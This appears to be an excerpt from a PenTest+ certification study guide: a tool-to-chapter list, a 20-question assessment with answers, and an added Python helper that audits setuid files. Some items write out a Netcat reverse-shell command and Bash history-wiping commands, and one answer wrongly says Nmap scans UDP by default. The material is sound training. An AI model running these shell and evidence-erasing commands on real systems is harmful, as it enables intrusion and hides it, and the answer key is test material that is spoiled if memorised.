5.2 Given a scenario, analyze a script or code sample for use in a penetration test: Chapter 12
5.3 Explain use cases of the following tools during the phases of a penetration test: Chapters 3, 4, 6, 7, 8, 9, 10
    Scanners: Chapter 4
        Nikto: Chapter 4
        Open vulnerability assessment scanner (OpenVAS): Chapter 4
        SQLmap: Chapter 4
        Nessus: Chapter 4
        Open Security Content Automation Protocol (SCAP): Chapter 4
        Wapiti: Chapter 4
        WPScan: Chapter 4
        Brakeman: Chapter 4
        Scout Suite: Chapter 10
    Credential testing tools: Chapter 10
        Hashcat: Chapter 10
        Medusa: Chapter 10
        Hydra: Chapter 10
        CeWL: Chapter 10
        John the Ripper: Chapter 10
        Cain: Chapter 10
        Mimikatz: Chapter 10
        Patator: Chapter 10
        DirBuster: Chapter 10
    Debuggers: Chapter 9
        OllyDbg: Chapter 9
        Immunity Debugger: Chapter 9
        GNU Debugger (GDB): Chapter 9
        WinDbg: Chapter 9
        Interactive Disassembler (IDA): Chapter 9
        Covenant: Chapter 9
        SearchSploit: Chapter 6
    OSINT: Chapter 3
        WHOIS: Chapter 3
        Nslookup: Chapter 3
        Fingerprinting Organization with Collected Archives (FOCA): Chapter 3
        theHarvester: Chapter 3
        Shodan: Chapter 3
        Maltego: Chapter 3
        Recon-ng: Chapter 3
        Censys: Chapter 3
    Wireless: Chapter 7
        Aircrack-ng suite: Chapter 7
        Kismet: Chapter 7
        Wifite2: Chapter 7
        Rogue access point: Chapter 7
        EAPHammer: Chapter 7
        Mdk4: Chapter 7
        Spooftooph: Chapter 7
        Reaver: Chapter 7
        Wireless Geographic Logging Engine (WiGLE): Chapter 7
        Fern: Chapter 7
    Web application tools: Chapter 9
        OWASP ZAP: Chapter 9
        Burp Suite: Chapter 9
        Gobuster: Chapter 9
        W3af: Chapter 10
    Social engineering tools: Chapter 8
        Social Engineering Toolkit (SET): Chapter 8
        BeEF: Chapter 8
    Remote access tools: Chapter 10
        Secure Shell (SSH): Chapter 10
        Ncat: Chapter 10
        Netcat: Chapter 10
        ProxyChains: Chapter 10
    Networking tools: Chapter 7
        Wireshark: Chapter 7
        Hping: Chapter 7
    Misc: Chapter 6
        SearchSploit: Chapter 6
        Responder: Chapter 6
        Impacket tools: Chapter 6
        Empire: Chapter 6
        Metasploit: Chapter 6
        mitm6: Chapter 6
        CrackMapExec: Chapter 6
        TruffleHog: Chapter 6
        Censys: Chapter 3
    Steganography tools: Chapter 9
        OpenStego: Chapter 9
        Steghide: Chapter 9
        Snow: Chapter 9
        Coagula: Chapter 9
        Sonic Visualizer: Chapter 9
        TinEye: Chapter 9
    Cloud tools: Chapter 10
        Scout Suite: Chapter 10
        CloudBrute: Chapter 10
        Pacu: Chapter 10
        Cloud Custodian: Chapter 10
If you're considering taking the PenTest+ exam, you should have already taken and passed the CompTIA Security+ and Network+ exams or have equivalent experience—typically at least three to four years of experience in the field. You may also already hold other equivalent or related certifications. The following assessment test will help to make sure you have the knowledge that you need before you tackle the PenTest+ certification, and it will help you determine where you may want to spend the most time with this book.
1. Ricky is conducting a penetration test against a web application and is looking for potential vulnerabilities to exploit. Which of the following vulnerabilities does not commonly exist in web applications?
A. SQL injection
B. VM escape
C. Buffer overflow
D. Cross-site scripting
2. What specialized type of legal document is often used to protect the confidentiality of data and other information that penetration testers may encounter?
A. An SOW
B. An NDA
C. An MSA
D. A noncompete
3. Chris is assisting Ricky with his penetration test and would like to extend the vulnerability search to include the use of dynamic testing. Which one of the following tools can he use as an interception proxy?
A. ZAP
B. Nessus
C. SonarQube
D. OllyDbg
4. Matt is part of a penetration testing team and is using a standard toolkit developed by his team. He is executing a password cracking script named password.sh. What language is this script most likely written in?
A. PowerShell
B. Bash
C. Ruby
D. Python
5. Renee is conducting a penetration test and discovers evidence that one of the systems she is exploring was already compromised by an attacker. What action should she take immediately after confirming her suspicions?
A. Record the details in the penetration testing report.
B. Remediate the vulnerability that allowed her to gain access.
C. Report the potential compromise to the client.
D. No further action is necessary because Renee's scope of work is limited to penetration testing.
6. Which of the following vulnerability scanning methods will provide the most accurate detail during a scan?
A. Black box
B. Authenticated
C. Internal view
D. External view
7. Annie wants to cover her tracks after compromising a Linux system. If she wants to permanently remove evidence of the commands she inputs to a Bash shell, which of the following commands should she use?
A. history -c
B. kill -9 $$
C. echo "" > /~/.bash_history
D. ln /dev/null ~/.bash_history -sf
8. Kaiden would like to perform an automated web application security scan of a new system before it is moved into production. Which one of the following tools is best suited for this task?
A. Nmap
B. Nikto
C. Wireshark
D. CeWL
9. Steve is engaged in a penetration test and is gathering information without actively scanning or otherwise probing his target. What type of information is he gathering?
A. OSINT
B. HSI
C. Background
D. None of the above
10. Which of the following activities constitutes a violation of integrity?
A. Systems were taken offline, resulting in a loss of business income.
B. Sensitive or proprietary information was changed or deleted.
C. Protected information was accessed or exfiltrated.
D. Sensitive personally identifiable information was accessed or exfiltrated.
11. Ted wants to scan a remote system using Nmap and uses the following command:
nmap 149.89.80.0/24
How many TCP ports will he scan?
A. 256
B. 1,000
C. 1,024
D. 65,535
12. Brian is conducting a thorough technical review of his organization's web servers. He is specifically looking for signs that the servers may have been breached in the past. What term best describes this activity?
A. Penetration testing
B. Vulnerability scanning
C. Remediation
D. Threat hunting
13. Liam executes the following command on a compromised system:
nc 10.1.10.1 7337 -e /bin/sh
What has he done?
A. Started a reverse shell using Netcat
B. Captured traffic on the Ethernet port to the console via Netcat
C. Set up a bind shell using Netcat
D. None of the above
14. Dan is attempting to use VLAN hopping to send traffic to VLANs other than the one he is on. What technique does the following diagram show?
A. A double jump
B. A powerhop
C. Double tagging
D. VLAN squeezing
15. Alaina wants to conduct an on-path attack against a target system. What technique can she use to make it appear that she has the IP address of a trusted server?
A. ARP spoofing
B. IP proofing
C. DHCP pirating
D. Spoofmastering
16. Michael's social engineering attack relies on telling the staff members he contacts that others have provided the information that he is requesting. What motivation technique is he using?
A. Authority
B. Scarcity
C. Likeness
D. Social proof
17. Vincent wants to gain access to workstations at his target but cannot find a way into the building. What technique can he use to do this if he is also unable to gain access remotely or on-site via the network?
A. Shoulder surfing
B. Kerberoasting
C. USB key drop
D. Quid pro quo
18. Jennifer is reviewing files in a directory on a Linux system and sees a file listed with the following attributes. What has she discovered?
-rwsr-xr-- 1 root kismet 653905 Nov 4 2016 /usr/bin/kismet_capture
A. An encrypted file
B. A hashed file
C. A SUID file
D. A SIP file
19. Which of the following tools is best suited to querying data provided by organizations like the American Registry for Internet Numbers (ARIN) as part of a footprinting or reconnaissance exercise?
A. Nmap
B. Traceroute
C. regmon
D. Whois
20. Chris believes that the Linux system he has compromised is a virtual machine. Which of the following techniques will not provide useful hints about whether or not the system is a VM?
A. Run systemd-detect-virt.
B. Run ls -l /dev/disk/by-id.
C. Run wmic baseboard to get manufacturer, product.
D. Run dmidecode to retrieve hardware information.
1. B. Web applications commonly experience SQL injection, buffer overflow, and cross-site scripting vulnerabilities. Virtual machine (VM) escape attacks work against the hypervisor of a virtualization platform and are not generally exploitable over the web. You'll learn more about all of these vulnerabilities in Chapters 5 and 9.
2. B. A nondisclosure agreement, or NDA, is a legal agreement that is designed to protect the confidentiality of the client's data and other information that the penetration tester may encounter during the test. An SOW is a statement of work, which defines what will be done during an engagement, an MSA is a master services agreement that sets the overall terms between two organizations (which then use SOWs to describe the actual work), and noncompetes are just that—an agreement that prevents competition, usually by preventing an employee from working for a competitor for a period of time after their current job ends. You'll learn more about the legal documents that are part of a penetration test in Chapter 2.
3. A. The Zed Attack Proxy (ZAP) from the Open Web Application Security Project (OWASP) is an interception proxy that is very useful in penetration testing. Nessus is a vulnerability scanner that you'll learn more about in Chapter 4. SonarQube is a static, not dynamic, software testing tool, and OllyDbg is a debugger. You'll learn more about these tools in Chapter 9.
4. B. The .sh file extension is commonly used for Bash scripts. PowerShell scripts usually have a .ps1 extension. Ruby scripts use the .rb extension, and Python scripts end with .py. You'll learn more about these languages in Chapter 11.
5. C. When penetration testers discover indicators of an ongoing or past compromise, they should immediately inform management and recommend that the organization activate its cybersecurity incident response process. You'll learn more about reporting and communication in Chapter 12.
6. B. An authenticated, or credentialed, scan provides the most detailed view of the system. Black-box assessments presume no knowledge of a system and would not have credentials or an agent to work with on the system. Internal views typically provide more detail than external views, but neither provides the same level of detail that credentials can allow. You'll learn more about authenticated scanning in Chapter 4.
7. D. Although all of these commands are useful for covering her tracks, only linking /dev/null to .bash_history will prevent the Bash history file from containing anything. Chapters 6 and 10 cover compromising hosts and hiding your tracks.
8. B. It's very important to know the use and purpose of various penetration testing tools when taking the PenTest+ exam. Nikto is the best tool to meet Kaiden's needs in this scenario, since it is a dedicated web application scanning tool. Nmap is a port scanner, and Wireshark is a packet analysis tool. The Custom Wordlist Generator (CeWL) is used to spider websites for keywords. None of the latter three tools perform web application security testing. You'll learn more about Nikto in Chapter 4.
9. A. OSINT, or open source intelligence, is information that can be gathered passively. Passive information gathering is useful because it is not typically visible to targets and can provide valuable information about systems, networks, and details that guide the active portion of a penetration test. Chapter 3 covers OSINT in more detail.
10. B. Integrity breaches involve data being modified or deleted. When systems are taken offline it is an availability issue, protected information being accessed might be classified as a breach of proprietary information, and sensitive personally identifiable information access would typically be classified as a privacy breach. You will learn more about the three goals of security—confidentiality, integrity, and availability—in Chapter 1.
11. B. By default, Nmap will scan the 1,000 most common ports for both TCP and UDP. Chapter 3 covers Nmap and port scanning, including details of what Nmap does by default and how.
12. D. Threat hunting uses the attacker mindset to search the organization's technology infrastructure for the artifacts of a successful attack. Threat hunters ask themselves what a hacker might do and what type of evidence they might leave behind and then go in search of that evidence. Brian's activity clearly fits this definition. You'll learn more about threat hunting in Chapter 1.
13. A. Liam has used Netcat to set up a reverse shell. This will connect to 10.1.10.1 on port 7337 and connect it to a Bash shell. Chapters 6 and 10 provide information about setting up remote access once you have compromised a system.
14. C. This is an example of a double-tagging attack used against 802.1q interfaces. The first tag will be stripped, allowing the second tag to be read as the VLAN tag for the packet. Double jumps may help video gamers, but the other two answers were made up for this question. Chapter 7 digs into network vulnerabilities and exploits.
15. A. ARP spoofing attacks rely on responding to a system's ARP queries faster than the actual target can, thus allowing the attacker to provide false information. Once accepted, the attacker's system can then conduct an on-path attack. Chapter 7 explores on-path attacks, methods, and uses.
16. D. Social engineering attacks that rely on social proof rely on persuading the target that other people have behaved similarly. Likeness may sound similar, but it relies on building trust and then persuading the target that they have things in common with the penetration tester. Chapter 8 covers social engineering and how to exploit human behaviors.
17. C. A USB key drop is a form of physical honeypot that can be used to tempt employees at a target organization into picking up and accessing USB drives that are distributed to places they are likely to be found. Typically one or more files will be placed on the drive that are tempting but conceal penetration testing tools that will install Trojans or remote access tools once accessed. Chapter 8 also covers physical security attacks, including techniques like key drops.
18. C. The s in the file attributes indicates that this is a SETUID or SUID file that allows it to run as its owner. Chapter 10 discusses vulnerabilities in Linux, including how to leverage vulnerable SUID files.
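Added example, not from the book: a small Python audit helper that parses ls -l lines like the one in this question and reports which entries carry the setuid, setgid or sticky bit, including the uppercase S/T form that marks a special bit set without its matching execute bit. The sample listing is constructed; only the kismet_capture line comes from the question, and the other paths are illustrative.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample output of "ls -l". The first line is the one from the
# question; the remaining lines are made up to exercise each special bit.
SAMPLE_LISTING = """\
-rwsr-xr-- 1 root kismet 653905 Nov 4 2016 /usr/bin/kismet_capture
-rwsr-xr-x 1 root root 68208 Mar 23 2022 /usr/bin/passwd
-rwxr-sr-x 1 root tty 22912 Mar 23 2022 /usr/bin/write
-rwSr--r-- 1 root root 4096 Jan 1 2021 /opt/app/broken_suid
drwxrwxrwt 2 root root 4096 Jan 1 2021 /tmp
-rwxr-xr-x 1 alice alice 1234 Jan 1 2021 /home/alice/tool
"""

# mode, link count, owner, group, size, three date/time tokens, then the path
LISTING_RE = re.compile(
    r"^(?P<mode>[-dlcbps][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\d+\s+\S+\s+\S+\s+\S+\s+(?P<path>.+)$"
)


@dataclass
class SpecialBits:
    path: str
    owner: str
    group: str
    setuid: bool
    setgid: bool
    sticky: bool
    dangling: bool  # special bit set but the matching execute bit is clear (S or T)


def parse_mode(mode: str) -> Tuple[bool, bool, bool, bool]:
    """Return (setuid, setgid, sticky, dangling) for a 10-character mode string.

    In ls output the execute position shows 's' (user/group) or 't' (other)
    when the special bit and the execute bit are both set, and 'S'/'T' when
    only the special bit is set.
    """
    if len(mode) != 10:
        raise ValueError(f"bad mode string: {mode!r}")
    user_x, group_x, other_x = mode[3], mode[6], mode[9]
    setuid = user_x in "sS"
    setgid = group_x in "sS"
    sticky = other_x in "tT"
    dangling = user_x == "S" or group_x == "S" or other_x == "T"
    return setuid, setgid, sticky, dangling


def parse_listing_line(line: str) -> Optional[SpecialBits]:
    """Parse one ls -l line; return None for lines that are not file entries."""
    m = LISTING_RE.match(line.strip())
    if not m:
        return None
    setuid, setgid, sticky, dangling = parse_mode(m["mode"])
    return SpecialBits(m["path"], m["owner"], m["group"], setuid, setgid, sticky, dangling)


def audit_listing(text: str) -> List[SpecialBits]:
    """Return every entry in the listing that carries a special bit."""
    found = []
    for line in text.splitlines():
        entry = parse_listing_line(line)
        if entry and (entry.setuid or entry.setgid or entry.sticky):
            found.append(entry)
    return found


def root_setuid_paths(text: str) -> List[str]:
    """Paths that run as root because of the setuid bit; the ones worth reviewing first."""
    return [e.path for e in audit_listing(text) if e.setuid and e.owner == "root"]


if __name__ == "__main__":
    for entry in audit_listing(SAMPLE_LISTING):
        print(entry)
    print("root-owned setuid:", root_setuid_paths(SAMPLE_LISTING))
```

The same parser works on the output of a real `find / -perm -4000 -exec ls -l {} \;` sweep, which is how a defender would enumerate setuid binaries for review.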
19. D. Regional Internet registries like ARIN are best queried either via their websites or using tools like Whois. Nmap is a useful port scanning utility, traceroute is used for testing the path packets take to a remote system, and regmon is an outdated Windows Registry tool that has been supplanted by Process Monitor. You'll read more about OSINT in Chapter 3.
20. C. All of these commands are useful ways to determine if a system is virtualized, but wmic is a Windows tool. You'll learn about VM escape and detection in Chapter 10.